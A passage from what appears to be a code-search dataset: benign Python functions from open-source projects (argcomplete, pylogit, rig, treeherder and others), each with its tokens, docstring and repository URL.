key=lambda x: x.idx)[0] ## add coal events event = ms.MassMigration( time=int(time), source=names[source.name], destination=names[dest.name], proportion=1.0) #print(int(time), names[source.name], names[dest.name]) ## ... demog.append(event) ## sim the data replicates = ms.simulate( population_configurations=pop_config, migration_matrix=migmat, demographic_events=demog, num_replicates=nreps, length=100, mutation_rate=1e-8) return replicates
[ "def", "_simulate", "(", "self", ",", "nreps", ",", "admix", "=", "None", ",", "Ns", "=", "500000", ",", "gen", "=", "20", ")", ":", "## node ages", "Taus", "=", "np", ".", "array", "(", "list", "(", "set", "(", "self", ".", "verts", "[", ":", ",", "1", "]", ")", ")", ")", "*", "1e4", "*", "gen", "## The tips samples, ordered alphanumerically", "## Population IDs correspond to their indexes in pop config", "ntips", "=", "len", "(", "self", ".", "tree", ")", "#names = {name: idx for idx, name in enumerate(sorted(self.tree.get_leaf_names()))}", "## rev ladderized leaf name order (left to right on downward facing tree)", "names", "=", "{", "name", ":", "idx", "for", "idx", ",", "name", "in", "enumerate", "(", "self", ".", "tree", ".", "get_leaf_names", "(", ")", "[", ":", ":", "-", "1", "]", ")", "}", "pop_config", "=", "[", "ms", ".", "PopulationConfiguration", "(", "sample_size", "=", "2", ",", "initial_size", "=", "Ns", ")", "for", "i", "in", "range", "(", "ntips", ")", "]", "## migration matrix all zeros init", "migmat", "=", "np", ".", "zeros", "(", "(", "ntips", ",", "ntips", ")", ")", ".", "tolist", "(", ")", "## a list for storing demographic events", "demog", "=", "[", "]", "## coalescent times", "coals", "=", "sorted", "(", "list", "(", "set", "(", "self", ".", "verts", "[", ":", ",", "1", "]", ")", ")", ")", "[", "1", ":", "]", "for", "ct", "in", "xrange", "(", "len", "(", "coals", ")", ")", ":", "## check for admix event before next coalescence", "## ...", "## print coals[ct], nidxs, time", "nidxs", "=", "np", ".", "where", "(", "self", ".", "verts", "[", ":", ",", "1", "]", "==", "coals", "[", "ct", "]", ")", "[", "0", "]", "time", "=", "Taus", "[", "ct", "+", "1", "]", "## add coalescence at each node", "for", "nidx", "in", "nidxs", ":", "node", "=", "self", ".", "tree", ".", "search_nodes", "(", "name", "=", "str", "(", "nidx", ")", ")", "[", "0", "]", "## get destionation (lowest child idx number), and other", "dest", "=", "sorted", "(", "node", ".", "get_leaves", "(", ")", ",", "key", "=", "lambda", "x", ":", "x", ".", "idx", ")", "[", "0", "]", "otherchild", "=", "[", "i", "for", "i", "in", "node", ".", "children", "if", "not", "i", ".", "get_leaves_by_name", "(", "dest", ".", "name", ")", "]", "[", "0", "]", "## get source", "if", "otherchild", ".", "is_leaf", "(", ")", ":", "source", "=", "otherchild", "else", ":", "source", "=", "sorted", "(", "otherchild", ".", "get_leaves", "(", ")", ",", "key", "=", "lambda", "x", ":", "x", ".", "idx", ")", "[", "0", "]", "## add coal events", "event", "=", "ms", ".", "MassMigration", "(", "time", "=", "int", "(", "time", ")", ",", "source", "=", "names", "[", "source", ".", "name", "]", ",", "destination", "=", "names", "[", "dest", ".", "name", "]", ",", "proportion", "=", "1.0", ")", "#print(int(time), names[source.name], names[dest.name])", "## ...", "demog", ".", "append", "(", "event", ")", "## sim the data", "replicates", "=", "ms", ".", "simulate", "(", "population_configurations", "=", "pop_config", ",", "migration_matrix", "=", "migmat", ",", "demographic_events", "=", "demog", ",", "num_replicates", "=", "nreps", ",", "length", "=", "100", ",", "mutation_rate", "=", "1e-8", ")", "return", "replicates" ]
Enter a baba.Tree object in which the 'tree' attribute (newick derived tree) has edge lengths in units of generations. You can use the 'gen' parameter to multiply branch lengths by a constant. Parameters: ----------- nreps: (int) Number of reps (loci) to simulate under the demographic scenario tree: (baba.Tree object) A baba.Tree object initialized by calling baba.Tree(*args). admix: (list) A list of admixture events to occur on the tree. Nodes must be reference by their index number, and events must occur in time intervals when edges exist. Use the .draw() function of the baba.Tree object to see node index numbers and coalescent times. Ns: (float) Fixed effective population size for all lineages (may allow to vary in the future). gen: (int) A multiplier applied to branch lengths to scale into units of generations. Example, if all edges on a tree were 1 then you might enter 50000 to multiply so that edges are 50K generations long.
[ "Enter", "a", "baba", ".", "Tree", "object", "in", "which", "the", "tree", "attribute", "(", "newick", "derived", "tree", ")", "has", "edge", "lengths", "in", "units", "of", "generations", ".", "You", "can", "use", "the", "gen", "parameter", "to", "multiply", "branch", "lengths", "by", "a", "constant", "." ]
python
valid
36.159574
kislyuk/argcomplete
argcomplete/__init__.py
https://github.com/kislyuk/argcomplete/blob/f9eb0a2354d9e6153f687c463df98c16251d97ed/argcomplete/__init__.py#L515-L561
def quote_completions(self, completions, cword_prequote, last_wordbreak_pos): """ If the word under the cursor started with a quote (as indicated by a nonempty ``cword_prequote``), escapes occurrences of that quote character in the completions, and adds the quote to the beginning of each completion. Otherwise, escapes all characters that bash splits words on (``COMP_WORDBREAKS``), and removes portions of completions before the first colon if (``COMP_WORDBREAKS``) contains a colon. If there is only one completion, and it doesn't end with a **continuation character** (``/``, ``:``, or ``=``), adds a space after the completion. This method is exposed for overriding in subclasses; there is no need to use it directly. """ special_chars = "\\" # If the word under the cursor was quoted, escape the quote char. # Otherwise, escape all special characters and specially handle all COMP_WORDBREAKS chars. if cword_prequote == "": # Bash mangles completions which contain characters in COMP_WORDBREAKS. # This workaround has the same effect as __ltrim_colon_completions in bash_completion # (extended to characters other than the colon). if last_wordbreak_pos: completions = [c[last_wordbreak_pos + 1:] for c in completions] special_chars += "();<>|&!`$* \t\n\"'" elif cword_prequote == '"': special_chars += '"`$!' if os.environ.get("_ARGCOMPLETE_SHELL") == "tcsh": # tcsh escapes special characters itself. special_chars = "" elif cword_prequote == "'": # Nothing can be escaped in single quotes, so we need to close # the string, escape the single quote, then open a new string. special_chars = "" completions = [c.replace("'", r"'\''") for c in completions] for char in special_chars: completions = [c.replace(char, "\\" + char) for c in completions] if self.append_space: # Similar functionality in bash was previously turned off by supplying the "-o nospace" option to complete. # Now it is conditionally disabled using "compopt -o nospace" if the match ends in a continuation character. # This code is retained for environments where this isn't done natively. continuation_chars = "=/:" if len(completions) == 1 and completions[0][-1] not in continuation_chars: if cword_prequote == "": completions[0] += " " return completions
[ "def", "quote_completions", "(", "self", ",", "completions", ",", "cword_prequote", ",", "last_wordbreak_pos", ")", ":", "special_chars", "=", "\"\\\\\"", "# If the word under the cursor was quoted, escape the quote char.", "# Otherwise, escape all special characters and specially handle all COMP_WORDBREAKS chars.", "if", "cword_prequote", "==", "\"\"", ":", "# Bash mangles completions which contain characters in COMP_WORDBREAKS.", "# This workaround has the same effect as __ltrim_colon_completions in bash_completion", "# (extended to characters other than the colon).", "if", "last_wordbreak_pos", ":", "completions", "=", "[", "c", "[", "last_wordbreak_pos", "+", "1", ":", "]", "for", "c", "in", "completions", "]", "special_chars", "+=", "\"();<>|&!`$* \\t\\n\\\"'\"", "elif", "cword_prequote", "==", "'\"'", ":", "special_chars", "+=", "'\"`$!'", "if", "os", ".", "environ", ".", "get", "(", "\"_ARGCOMPLETE_SHELL\"", ")", "==", "\"tcsh\"", ":", "# tcsh escapes special characters itself.", "special_chars", "=", "\"\"", "elif", "cword_prequote", "==", "\"'\"", ":", "# Nothing can be escaped in single quotes, so we need to close", "# the string, escape the single quote, then open a new string.", "special_chars", "=", "\"\"", "completions", "=", "[", "c", ".", "replace", "(", "\"'\"", ",", "r\"'\\''\"", ")", "for", "c", "in", "completions", "]", "for", "char", "in", "special_chars", ":", "completions", "=", "[", "c", ".", "replace", "(", "char", ",", "\"\\\\\"", "+", "char", ")", "for", "c", "in", "completions", "]", "if", "self", ".", "append_space", ":", "# Similar functionality in bash was previously turned off by supplying the \"-o nospace\" option to complete.", "# Now it is conditionally disabled using \"compopt -o nospace\" if the match ends in a continuation character.", "# This code is retained for environments where this isn't done natively.", "continuation_chars", "=", "\"=/:\"", "if", "len", "(", "completions", ")", "==", "1", "and", "completions", "[", "0", "]", "[", "-", "1", "]", "not", "in", "continuation_chars", ":", "if", "cword_prequote", "==", "\"\"", ":", "completions", "[", "0", "]", "+=", "\" \"", "return", "completions" ]
If the word under the cursor started with a quote (as indicated by a nonempty ``cword_prequote``), escapes occurrences of that quote character in the completions, and adds the quote to the beginning of each completion. Otherwise, escapes all characters that bash splits words on (``COMP_WORDBREAKS``), and removes portions of completions before the first colon if (``COMP_WORDBREAKS``) contains a colon. If there is only one completion, and it doesn't end with a **continuation character** (``/``, ``:``, or ``=``), adds a space after the completion. This method is exposed for overriding in subclasses; there is no need to use it directly.
[ "If", "the", "word", "under", "the", "cursor", "started", "with", "a", "quote", "(", "as", "indicated", "by", "a", "nonempty", "cword_prequote", ")", "escapes", "occurrences", "of", "that", "quote", "character", "in", "the", "completions", "and", "adds", "the", "quote", "to", "the", "beginning", "of", "each", "completion", ".", "Otherwise", "escapes", "all", "characters", "that", "bash", "splits", "words", "on", "(", "COMP_WORDBREAKS", ")", "and", "removes", "portions", "of", "completions", "before", "the", "first", "colon", "if", "(", "COMP_WORDBREAKS", ")", "contains", "a", "colon", "." ]
python
train
55.595745
timothyb0912/pylogit
pylogit/base_multinomial_cm_v2.py
https://github.com/timothyb0912/pylogit/blob/f83b0fd6debaa7358d87c3828428f6d4ead71357/pylogit/base_multinomial_cm_v2.py#L296-L327
def ensure_all_alt_ids_have_a_nest(nest_spec, list_elements, all_ids): """ Ensures that the alternative id's in `nest_spec` are all associated with a nest. Raises a helpful ValueError if they are not. Parameters ---------- nest_spec : OrderedDict, or None, optional. Keys are strings that define the name of the nests. Values are lists of alternative ids, denoting which alternatives belong to which nests. Each alternative id must only be associated with a single nest! Default == None. list_elements : list of ints. Each element should correspond to one of the alternatives identified as belonging to a nest. all_ids : list of ints. Each element should correspond to one of the alternatives that is present in the universal choice set for this model. Returns ------- None. """ unaccounted_alt_ids = [] for alt_id in all_ids: if alt_id not in list_elements: unaccounted_alt_ids.append(alt_id) if unaccounted_alt_ids != []: msg = "Associate the following alternative ids with a nest: {}" raise ValueError(msg.format(unaccounted_alt_ids)) return None
[ "def", "ensure_all_alt_ids_have_a_nest", "(", "nest_spec", ",", "list_elements", ",", "all_ids", ")", ":", "unaccounted_alt_ids", "=", "[", "]", "for", "alt_id", "in", "all_ids", ":", "if", "alt_id", "not", "in", "list_elements", ":", "unaccounted_alt_ids", ".", "append", "(", "alt_id", ")", "if", "unaccounted_alt_ids", "!=", "[", "]", ":", "msg", "=", "\"Associate the following alternative ids with a nest: {}\"", "raise", "ValueError", "(", "msg", ".", "format", "(", "unaccounted_alt_ids", ")", ")", "return", "None" ]
Ensures that the alternative id's in `nest_spec` are all associated with a nest. Raises a helpful ValueError if they are not. Parameters ---------- nest_spec : OrderedDict, or None, optional. Keys are strings that define the name of the nests. Values are lists of alternative ids, denoting which alternatives belong to which nests. Each alternative id must only be associated with a single nest! Default == None. list_elements : list of ints. Each element should correspond to one of the alternatives identified as belonging to a nest. all_ids : list of ints. Each element should correspond to one of the alternatives that is present in the universal choice set for this model. Returns ------- None.
[ "Ensures", "that", "the", "alternative", "id", "s", "in", "nest_spec", "are", "all", "associated", "with", "a", "nest", ".", "Raises", "a", "helpful", "ValueError", "if", "they", "are", "not", "." ]
python
train
37.03125
MartinThoma/hwrt
hwrt/filter_dataset.py
https://github.com/MartinThoma/hwrt/blob/725c21a3d0f5a30b8492cbc184b3688ceb364e1c/hwrt/filter_dataset.py#L200-L217
def load_raw(raw_pickle_file): """ Load a pickle file of raw recordings. Parameters ---------- raw_pickle_file : str Path to a pickle file which contains raw recordings. Returns ------- dict The loaded pickle file. """ with open(raw_pickle_file, 'rb') as f: raw = pickle.load(f) logging.info("Loaded %i recordings.", len(raw['handwriting_datasets'])) return raw
[ "def", "load_raw", "(", "raw_pickle_file", ")", ":", "with", "open", "(", "raw_pickle_file", ",", "'rb'", ")", "as", "f", ":", "raw", "=", "pickle", ".", "load", "(", "f", ")", "logging", ".", "info", "(", "\"Loaded %i recordings.\"", ",", "len", "(", "raw", "[", "'handwriting_datasets'", "]", ")", ")", "return", "raw" ]
Load a pickle file of raw recordings. Parameters ---------- raw_pickle_file : str Path to a pickle file which contains raw recordings. Returns ------- dict The loaded pickle file.
[ "Load", "a", "pickle", "file", "of", "raw", "recordings", "." ]
python
train
23.222222
project-rig/rig
rig/routing_table/utils.py
https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/utils.py#L8-L83
def routing_tree_to_tables(routes, net_keys): """Convert a set of :py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip set of routing tables. .. warning:: A :py:exc:`rig.routing_table.MultisourceRouteError` will be raised if entries with identical keys and masks but with differing routes are generated. This is not a perfect test, entries which would otherwise collide are not spotted. .. warning:: The routing trees provided are assumed to be correct and continuous (not missing any hops). If this is not the case, the output is undefined. .. note:: If a routing tree has a terminating vertex whose route is set to None, that vertex is ignored. Parameters ---------- routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \ ...} The complete set of RoutingTrees representing all routes in the system. (Note: this is the same data structure produced by routers in the :py:mod:`~rig.place_and_route` module.) net_keys : {net: (key, mask), ...} The key and mask associated with each net. Returns ------- {(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...] """ # Pairs of inbound and outbound routes. InOutPair = namedtuple("InOutPair", "ins, outs") # {(x, y): {(key, mask): _InOutPair}} route_sets = defaultdict(OrderedDict) for net, routing_tree in iteritems(routes): key, mask = net_keys[net] # The direction is the Links entry which describes the direction in # which we last moved to reach the node (or None for the root). for direction, (x, y), out_directions in routing_tree.traverse(): # Determine the in_direction in_direction = direction if in_direction is not None: in_direction = direction.opposite # Add a routing entry if (key, mask) in route_sets[(x, y)]: # If there is an existing route set raise an error if the out # directions are not equivalent. if route_sets[(x, y)][(key, mask)].outs != out_directions: raise MultisourceRouteError(key, mask, (x, y)) # Otherwise, add the input directions as this represents a # merge of the routes. route_sets[(x, y)][(key, mask)].ins.add(in_direction) else: # Otherwise create a new route set route_sets[(x, y)][(key, mask)] = \ InOutPair({in_direction}, set(out_directions)) # Construct the routing tables from the route sets routing_tables = defaultdict(list) for (x, y), routes in iteritems(route_sets): for (key, mask), route in iteritems(routes): # Add the route routing_tables[(x, y)].append( RoutingTableEntry(route.outs, key, mask, route.ins) ) return routing_tables
[ "def", "routing_tree_to_tables", "(", "routes", ",", "net_keys", ")", ":", "# Pairs of inbound and outbound routes.", "InOutPair", "=", "namedtuple", "(", "\"InOutPair\"", ",", "\"ins, outs\"", ")", "# {(x, y): {(key, mask): _InOutPair}}", "route_sets", "=", "defaultdict", "(", "OrderedDict", ")", "for", "net", ",", "routing_tree", "in", "iteritems", "(", "routes", ")", ":", "key", ",", "mask", "=", "net_keys", "[", "net", "]", "# The direction is the Links entry which describes the direction in", "# which we last moved to reach the node (or None for the root).", "for", "direction", ",", "(", "x", ",", "y", ")", ",", "out_directions", "in", "routing_tree", ".", "traverse", "(", ")", ":", "# Determine the in_direction", "in_direction", "=", "direction", "if", "in_direction", "is", "not", "None", ":", "in_direction", "=", "direction", ".", "opposite", "# Add a routing entry", "if", "(", "key", ",", "mask", ")", "in", "route_sets", "[", "(", "x", ",", "y", ")", "]", ":", "# If there is an existing route set raise an error if the out", "# directions are not equivalent.", "if", "route_sets", "[", "(", "x", ",", "y", ")", "]", "[", "(", "key", ",", "mask", ")", "]", ".", "outs", "!=", "out_directions", ":", "raise", "MultisourceRouteError", "(", "key", ",", "mask", ",", "(", "x", ",", "y", ")", ")", "# Otherwise, add the input directions as this represents a", "# merge of the routes.", "route_sets", "[", "(", "x", ",", "y", ")", "]", "[", "(", "key", ",", "mask", ")", "]", ".", "ins", ".", "add", "(", "in_direction", ")", "else", ":", "# Otherwise create a new route set", "route_sets", "[", "(", "x", ",", "y", ")", "]", "[", "(", "key", ",", "mask", ")", "]", "=", "InOutPair", "(", "{", "in_direction", "}", ",", "set", "(", "out_directions", ")", ")", "# Construct the routing tables from the route sets", "routing_tables", "=", "defaultdict", "(", "list", ")", "for", "(", "x", ",", "y", ")", ",", "routes", "in", "iteritems", "(", "route_sets", ")", ":", "for", "(", "key", ",", "mask", ")", ",", "route", "in", "iteritems", "(", "routes", ")", ":", "# Add the route", "routing_tables", "[", "(", "x", ",", "y", ")", "]", ".", "append", "(", "RoutingTableEntry", "(", "route", ".", "outs", ",", "key", ",", "mask", ",", "route", ".", "ins", ")", ")", "return", "routing_tables" ]
Convert a set of :py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip set of routing tables. .. warning:: A :py:exc:`rig.routing_table.MultisourceRouteError` will be raised if entries with identical keys and masks but with differing routes are generated. This is not a perfect test, entries which would otherwise collide are not spotted. .. warning:: The routing trees provided are assumed to be correct and continuous (not missing any hops). If this is not the case, the output is undefined. .. note:: If a routing tree has a terminating vertex whose route is set to None, that vertex is ignored. Parameters ---------- routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \ ...} The complete set of RoutingTrees representing all routes in the system. (Note: this is the same data structure produced by routers in the :py:mod:`~rig.place_and_route` module.) net_keys : {net: (key, mask), ...} The key and mask associated with each net. Returns ------- {(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
[ "Convert", "a", "set", "of", ":", "py", ":", "class", ":", "~rig", ".", "place_and_route", ".", "routing_tree", ".", "RoutingTree", "s", "into", "a", "per", "-", "chip", "set", "of", "routing", "tables", "." ]
python
train
39.184211
mozilla/treeherder
treeherder/etl/jobs.py
https://github.com/mozilla/treeherder/blob/cc47bdec872e5c668d0f01df89517390a164cda3/treeherder/etl/jobs.py#L331-L372
def _schedule_log_parsing(job, job_logs, result): """Kick off the initial task that parses the log data. log_data is a list of job log objects and the result for that job """ # importing here to avoid an import loop from treeherder.log_parser.tasks import parse_logs task_types = { "errorsummary_json", "buildbot_text", "builds-4h" } job_log_ids = [] for job_log in job_logs: # a log can be submitted already parsed. So only schedule # a parsing task if it's ``pending`` # the submitter is then responsible for submitting the # text_log_summary artifact if job_log.status != JobLog.PENDING: continue # if this is not a known type of log, abort parse if job_log.name not in task_types: continue job_log_ids.append(job_log.id) # TODO: Replace the use of different queues for failures vs not with the # RabbitMQ priority feature (since the idea behind separate queues was # only to ensure failures are dealt with first if there is a backlog). if result != 'success': queue = 'log_parser_fail' priority = 'failures' else: queue = 'log_parser' priority = "normal" parse_logs.apply_async(queue=queue, args=[job.id, job_log_ids, priority])
[ "def", "_schedule_log_parsing", "(", "job", ",", "job_logs", ",", "result", ")", ":", "# importing here to avoid an import loop", "from", "treeherder", ".", "log_parser", ".", "tasks", "import", "parse_logs", "task_types", "=", "{", "\"errorsummary_json\"", ",", "\"buildbot_text\"", ",", "\"builds-4h\"", "}", "job_log_ids", "=", "[", "]", "for", "job_log", "in", "job_logs", ":", "# a log can be submitted already parsed. So only schedule", "# a parsing task if it's ``pending``", "# the submitter is then responsible for submitting the", "# text_log_summary artifact", "if", "job_log", ".", "status", "!=", "JobLog", ".", "PENDING", ":", "continue", "# if this is not a known type of log, abort parse", "if", "job_log", ".", "name", "not", "in", "task_types", ":", "continue", "job_log_ids", ".", "append", "(", "job_log", ".", "id", ")", "# TODO: Replace the use of different queues for failures vs not with the", "# RabbitMQ priority feature (since the idea behind separate queues was", "# only to ensure failures are dealt with first if there is a backlog).", "if", "result", "!=", "'success'", ":", "queue", "=", "'log_parser_fail'", "priority", "=", "'failures'", "else", ":", "queue", "=", "'log_parser'", "priority", "=", "\"normal\"", "parse_logs", ".", "apply_async", "(", "queue", "=", "queue", ",", "args", "=", "[", "job", ".", "id", ",", "job_log_ids", ",", "priority", "]", ")" ]
Kick off the initial task that parses the log data. log_data is a list of job log objects and the result for that job
[ "Kick", "off", "the", "initial", "task", "that", "parses", "the", "log", "data", "." ]
python
train
31.690476
Robpol86/etaprogress
etaprogress/components/units.py
https://github.com/Robpol86/etaprogress/blob/224e8a248c2bf820bad218763281914ad3983fff/etaprogress/components/units.py#L82-L93
def auto(self): """Returns the highest whole-number unit.""" if self._value >= 1099511627776: return self.TiB, 'TiB' if self._value >= 1073741824: return self.GiB, 'GiB' if self._value >= 1048576: return self.MiB, 'MiB' if self._value >= 1024: return self.KiB, 'KiB' else: return self.B, 'B'
[ "def", "auto", "(", "self", ")", ":", "if", "self", ".", "_value", ">=", "1099511627776", ":", "return", "self", ".", "TiB", ",", "'TiB'", "if", "self", ".", "_value", ">=", "1073741824", ":", "return", "self", ".", "GiB", ",", "'GiB'", "if", "self", ".", "_value", ">=", "1048576", ":", "return", "self", ".", "MiB", ",", "'MiB'", "if", "self", ".", "_value", ">=", "1024", ":", "return", "self", ".", "KiB", ",", "'KiB'", "else", ":", "return", "self", ".", "B", ",", "'B'" ]
Returns the highest whole-number unit.
[ "Returns", "the", "highest", "whole", "-", "number", "unit", "." ]
python
train
32.333333
Kane610/deconz
pydeconz/light.py
https://github.com/Kane610/deconz/blob/8a9498dbbc8c168d4a081173ad6c3b1e17fffdf6/pydeconz/light.py#L25-L32
def async_update(self, event): """New event for light. Check that state is part of event. Signal that light has updated state. """ self.update_attr(event.get('state', {})) super().async_update(event)
[ "def", "async_update", "(", "self", ",", "event", ")", ":", "self", ".", "update_attr", "(", "event", ".", "get", "(", "'state'", ",", "{", "}", ")", ")", "super", "(", ")", ".", "async_update", "(", "event", ")" ]
New event for light. Check that state is part of event. Signal that light has updated state.
[ "New", "event", "for", "light", "." ]
python
train
30.125
ArchiveTeam/wpull
wpull/network/dns.py
https://github.com/ArchiveTeam/wpull/blob/ddf051aa3322479325ba20aa778cb2cb97606bf5/wpull/network/dns.py#L95-L98
def rotate(self): '''Move the first address to the last position.''' item = self._address_infos.pop(0) self._address_infos.append(item)
[ "def", "rotate", "(", "self", ")", ":", "item", "=", "self", ".", "_address_infos", ".", "pop", "(", "0", ")", "self", ".", "_address_infos", ".", "append", "(", "item", ")" ]
Move the first address to the last position.
[ "Move", "the", "first", "address", "to", "the", "last", "position", "." ]
python
train
39
RudolfCardinal/pythonlib
cardinal_pythonlib/wsgi/reverse_proxied_mw.py
https://github.com/RudolfCardinal/pythonlib/blob/0b84cb35f38bd7d8723958dae51b480a829b7227/cardinal_pythonlib/wsgi/reverse_proxied_mw.py#L50-L70
def ip_addresses_from_xff(value: str) -> List[str]: """ Returns a list of IP addresses (as strings), given the value of an HTTP ``X-Forwarded-For`` (or ``WSGI HTTP_X_FORWARDED_FOR``) header. Args: value: the value of an HTTP ``X-Forwarded-For`` (or ``WSGI HTTP_X_FORWARDED_FOR``) header Returns: a list of IP address as strings See: - https://en.wikipedia.org/wiki/X-Forwarded-For - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For # noqa - NOT THIS: http://tools.ietf.org/html/rfc7239 """ if not value: return [] return [x.strip() for x in value.split(",")]
[ "def", "ip_addresses_from_xff", "(", "value", ":", "str", ")", "->", "List", "[", "str", "]", ":", "if", "not", "value", ":", "return", "[", "]", "return", "[", "x", ".", "strip", "(", ")", "for", "x", "in", "value", ".", "split", "(", "\",\"", ")", "]" ]
Returns a list of IP addresses (as strings), given the value of an HTTP ``X-Forwarded-For`` (or ``WSGI HTTP_X_FORWARDED_FOR``) header. Args: value: the value of an HTTP ``X-Forwarded-For`` (or ``WSGI HTTP_X_FORWARDED_FOR``) header Returns: a list of IP address as strings See: - https://en.wikipedia.org/wiki/X-Forwarded-For - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For # noqa - NOT THIS: http://tools.ietf.org/html/rfc7239
[ "Returns", "a", "list", "of", "IP", "addresses", "(", "as", "strings", ")", "given", "the", "value", "of", "an", "HTTP", "X", "-", "Forwarded", "-", "For", "(", "or", "WSGI", "HTTP_X_FORWARDED_FOR", ")", "header", "." ]
python
train
31.571429
cloud-custodian/cloud-custodian
c7n/log.py
https://github.com/cloud-custodian/cloud-custodian/blob/52ef732eb3d7bc939d1579faf519314814695c08/c7n/log.py#L123-L129
def flush(self): """Ensure all logging output has been flushed.""" if self.shutdown: return self.flush_buffers(force=True) self.queue.put(FLUSH_MARKER) self.queue.join()
[ "def", "flush", "(", "self", ")", ":", "if", "self", ".", "shutdown", ":", "return", "self", ".", "flush_buffers", "(", "force", "=", "True", ")", "self", ".", "queue", ".", "put", "(", "FLUSH_MARKER", ")", "self", ".", "queue", ".", "join", "(", ")" ]
Ensure all logging output has been flushed.
[ "Ensure", "all", "logging", "output", "has", "been", "flushed", "." ]
python
train
30.714286
mozilla/elasticutils
elasticutils/contrib/django/__init__.py
https://github.com/mozilla/elasticutils/blob/b880cc5d51fb1079b0581255ec664c1ec934656e/elasticutils/contrib/django/__init__.py#L185-L190
def get_doctypes(self, default_doctypes=None): """Returns the doctypes (or mapping type names) to use.""" doctypes = self.type.get_mapping_type_name() if isinstance(doctypes, six.string_types): doctypes = [doctypes] return super(S, self).get_doctypes(default_doctypes=doctypes)
[ "def", "get_doctypes", "(", "self", ",", "default_doctypes", "=", "None", ")", ":", "doctypes", "=", "self", ".", "type", ".", "get_mapping_type_name", "(", ")", "if", "isinstance", "(", "doctypes", ",", "six", ".", "string_types", ")", ":", "doctypes", "=", "[", "doctypes", "]", "return", "super", "(", "S", ",", "self", ")", ".", "get_doctypes", "(", "default_doctypes", "=", "doctypes", ")" ]
Returns the doctypes (or mapping type names) to use.
[ "Returns", "the", "doctypes", "(", "or", "mapping", "type", "names", ")", "to", "use", "." ]
python
train
52.666667
ic-labs/django-icekit
icekit/publishing/managers.py
https://github.com/ic-labs/django-icekit/blob/c507ea5b1864303732c53ad7c5800571fca5fa94/icekit/publishing/managers.py#L201-L233
def _queryset_iterator(qs): """ Override default iterator to wrap returned items in a publishing sanity-checker "booby trap" to lazily raise an exception if DRAFT items are mistakenly returned and mis-used in a public context where only PUBLISHED items should be used. This booby trap is added when all of: - the publishing middleware is active, and therefore able to report accurately whether the request is in a drafts-permitted context - the publishing middleware tells us we are not in a drafts-permitted context, which means only published items should be used. """ # Avoid double-processing draft items in our custom iterator when we # are in a `PublishingQuerySet` that is also a subclass of the # monkey-patched `UrlNodeQuerySet` if issubclass(type(qs), UrlNodeQuerySet): super_without_boobytrap_iterator = super(UrlNodeQuerySet, qs) else: super_without_boobytrap_iterator = super(PublishingQuerySet, qs) if is_publishing_middleware_active() \ and not is_draft_request_context(): for item in super_without_boobytrap_iterator.iterator(): if getattr(item, 'publishing_is_draft', False): yield DraftItemBoobyTrap(item) else: yield item else: for item in super_without_boobytrap_iterator.iterator(): yield item
[ "def", "_queryset_iterator", "(", "qs", ")", ":", "# Avoid double-processing draft items in our custom iterator when we", "# are in a `PublishingQuerySet` that is also a subclass of the", "# monkey-patched `UrlNodeQuerySet`", "if", "issubclass", "(", "type", "(", "qs", ")", ",", "UrlNodeQuerySet", ")", ":", "super_without_boobytrap_iterator", "=", "super", "(", "UrlNodeQuerySet", ",", "qs", ")", "else", ":", "super_without_boobytrap_iterator", "=", "super", "(", "PublishingQuerySet", ",", "qs", ")", "if", "is_publishing_middleware_active", "(", ")", "and", "not", "is_draft_request_context", "(", ")", ":", "for", "item", "in", "super_without_boobytrap_iterator", ".", "iterator", "(", ")", ":", "if", "getattr", "(", "item", ",", "'publishing_is_draft'", ",", "False", ")", ":", "yield", "DraftItemBoobyTrap", "(", "item", ")", "else", ":", "yield", "item", "else", ":", "for", "item", "in", "super_without_boobytrap_iterator", ".", "iterator", "(", ")", ":", "yield", "item" ]
Override default iterator to wrap returned items in a publishing sanity-checker "booby trap" to lazily raise an exception if DRAFT items are mistakenly returned and mis-used in a public context where only PUBLISHED items should be used. This booby trap is added when all of: - the publishing middleware is active, and therefore able to report accurately whether the request is in a drafts-permitted context - the publishing middleware tells us we are not in a drafts-permitted context, which means only published items should be used.
[ "Override", "default", "iterator", "to", "wrap", "returned", "items", "in", "a", "publishing", "sanity", "-", "checker", "booby", "trap", "to", "lazily", "raise", "an", "exception", "if", "DRAFT", "items", "are", "mistakenly", "returned", "and", "mis", "-", "used", "in", "a", "public", "context", "where", "only", "PUBLISHED", "items", "should", "be", "used", "." ]
python
train
41.606061
dade-ai/snipy
snipy/plt/ploting.py
https://github.com/dade-ai/snipy/blob/408520867179f99b3158b57520e2619f3fecd69b/snipy/plt/ploting.py#L433-L444
def imbound(clspatch, *args, **kwargs): """ :param clspatch: :param args: :param kwargs: :return: """ # todo : add example c = kwargs.pop('color', kwargs.get('edgecolor', None)) kwargs.update(facecolor='none', edgecolor=c) return impatch(clspatch, *args, **kwargs)
[ "def", "imbound", "(", "clspatch", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "# todo : add example", "c", "=", "kwargs", ".", "pop", "(", "'color'", ",", "kwargs", ".", "get", "(", "'edgecolor'", ",", "None", ")", ")", "kwargs", ".", "update", "(", "facecolor", "=", "'none'", ",", "edgecolor", "=", "c", ")", "return", "impatch", "(", "clspatch", ",", "*", "args", ",", "*", "*", "kwargs", ")" ]
:param clspatch: :param args: :param kwargs: :return:
[ ":", "param", "clspatch", ":", ":", "param", "args", ":", ":", "param", "kwargs", ":", ":", "return", ":" ]
python
valid
24.5
marl/jams
scripts/jams_to_lab.py
https://github.com/marl/jams/blob/b16778399b9528efbd71434842a079f7691a7a66/scripts/jams_to_lab.py#L156-L182
def parse_arguments(args): '''Parse arguments from the command line''' parser = argparse.ArgumentParser(description='Convert JAMS to .lab files') parser.add_argument('-c', '--comma-separated', dest='csv', action='store_true', default=False, help='Output in .csv instead of .lab') parser.add_argument('--comment', dest='comment_char', type=str, default='#', help='Comment character') parser.add_argument('-n', '--namespace', dest='namespaces', nargs='+', default=['.*'], help='One or more namespaces to output. Default is all.') parser.add_argument('jams_file', help='Path to the input jams file') parser.add_argument('output_prefix', help='Prefix for output files') return vars(parser.parse_args(args))
